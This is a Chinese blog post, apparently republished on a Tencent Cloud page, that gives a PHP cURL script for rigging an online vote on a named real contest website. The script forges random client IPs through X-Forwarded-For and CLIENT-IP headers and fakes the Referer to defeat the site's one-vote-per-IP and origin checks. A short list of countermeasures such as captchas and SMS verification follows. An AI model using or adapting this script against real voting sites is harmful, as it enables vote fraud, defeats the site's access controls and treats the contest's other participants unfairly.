PHP实现网络刷投票

PHP刷投票,让你高居榜首!

案例为一个半月以前。没有及时放出原因有二,一是因为博客域名备案没有下来,没有心情写东西。二是最主要的,及时放出对案例网站有严重的损害,不是我等IT人应有的。

Ps:刷票有风险,使用需谨慎。本文谨做学习研究讨论之用,不可用作不正当用途!

本文为本博客的处女之作,题材源于近日一朋友要求,是因为她的姐姐参加了一个书法比赛,问我能不能在网站上刷投票。作为刚刚出道一年的小菜鸟,我很惶恐。一年前刚刚接触PHP的时候,完全不知道做,现在第一反应就是Curl。

废话不多说了,直接上代码。

<?php

header('Content-type: text/html; charset=gb2312');

//随机生成IP

$ip1 = rand(101, 255).'.';

$ip2 = rand(1, 255).'.';

$ip3 = rand(1, 255).'.';

$ip4 = rand(1, 255);

$ip = $ip1 . $ip2 . $ip3 . $ip4;

$clientIp = 'CLIENT-IP:'.$ip;

$xforwarded = 'X-FORWARDED-FOR:'.$ip;

//设置目标和来源

$url = 'http://www.dunhuangwomen.org.cn/vote/Vote.asp?id=67';

$referer = 'http://www.dunhuangwomen.org.cn/vote/list.asp?id=2';

//Curl

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url); //目标

curl_setopt($ch, CURLOPT_HTTPHEADER, array($xforwarded, $clientIp)); //构造IP

curl_setopt($ch, CURLOPT_REFERER, $referer); //来源

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_HEADER, 0);

$ret = curl_exec($ch);

curl_close($ch);

echo $ret;

?>

好,来分析一下。

1、仿造IP,网站有限制一个IP在一天只可以投一次

2、填写来源,网站会判断请求的来源是否合法路径

其他就是Curl的常规了选项了。

如何防治?

本人才疏学浅,仅作跑砖引玉。

1、限制IP

本文已经破解

2、限制来源

本文已经破解

3、验证码。作为最反人类的发明之一,可以使用这个拥有高大上的名字的全自动区分计算机和人类的图灵测试。

可用Opencv。

4、记录MAC地址。

理论上每块网卡都有一个唯一的MAC地址,如果更改可能引起冲突而无法上网。目前也可以用软件修改

5、注册会员

虽说仍然可以突破验证码,Curl填写参数然后POST过去,但是门槛毕竟高了一丁点,还是忽略吧。

6、手机

投票时输入手机号和短信验证码,成本高,单位不愿意。用户发送某某指令到某某,用户自掏腰包,用户不愿意。

目前来说,只有验证码,手机并且验证手机的有效性是最好的防治措施。

原文发布于微信公众号 - php(phpdaily)

原文发表时间:2016-02-29

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏知晓程序

海量高清二次元壁纸!快来把老婆抱回家吧

今天,知晓程序(微信号 zxcx0101)要给广大动漫迷们,推荐一款名叫「Soda 壁纸」小程序,导航用的是颜文字,图库里全是高清壁纸,十分带感。

522
来自专栏DeveWork

Gulp 工作流中Sass 增量编译功能的探索

大约是上一年的这个时候,因为项目合并来到了新的项目组中。虽然协作的同岗位同事也是同一个组的,但使用的Gulp 工作流却有些不一样。第一天做项目需求的时候,就遇到...

2306
来自专栏ATYUN订阅号

谷歌重磅推出Android Pie,以AI为驱动

谷歌今天透露,Android P代表Android Pie,接替Android Oreo,并将最新的源代码推送到Android开源项目(AOSP)。谷歌移动操作...

642
来自专栏云计算与大数据

研发:认识反射型攻击放大效果

“肉鸡”这个黑客术语指的是被黑客秘密控制的主机,当“肉鸡”规模达到一定程度之后就会出现不易管理的问题,为了解决管理的问题,出现了相应的网络技术,于是就出现了僵尸...

1093
来自专栏企鹅号快讯

如何使用EndNote Match

貌似大家差不多都逃不出脱单、六级、雅思、SCI、考研、考博...的魔咒 那小博只好准备一篇 如何使用EndNote Match教程给你们祝早日出刊(笔芯~) 第...

1909
来自专栏后台日记

EXIF--你可能想象不到的信息泄露

用户是幸福的,因为他们根本不知道他们的隐私信息在不经意之间泄露。

2947
来自专栏Coding01

构建一份有价值的 Awesome Laravel 清单

跟前几年比,现在越来越多的开发者喜欢使用 Laravel,研究 Laravel。但 Laravel 框架的学习曲线比较陡,市面上各种各样 Laravel 学习资...

712
来自专栏贺嘉的专栏

一篇文章带你看懂 Cloudflare 信息泄露事件

近期根据Hacker News的报道,敏感信息、API 密钥被Cloudflare泄露给了随机的 requesters请求,我们为大家进行深度解读并提供解决方案...

1.1K0
来自专栏FreeBuf

Mirai感染监控摄像头过程观察,几十秒就完成感染

背景 最近发生了一系列由Mirai僵尸网络驱动的攻击事件,包括此前的法国网站主机OVH遭攻击(点击原文查看链接)、Dyn被黑导致美国大半个互联网瘫痪(点击原文查...

2235
来自专栏FreeBuf

极客DIY:童年的掌上游戏机

写在前面 小伙伴们,还记得过去的掌上游戏机吗?一名网友wermy在YouTube上面上传了一个DIY掌上游戏机的视频,下面就一起来怀念一下童年的见闻。 game...

1996

扫码关注云+社区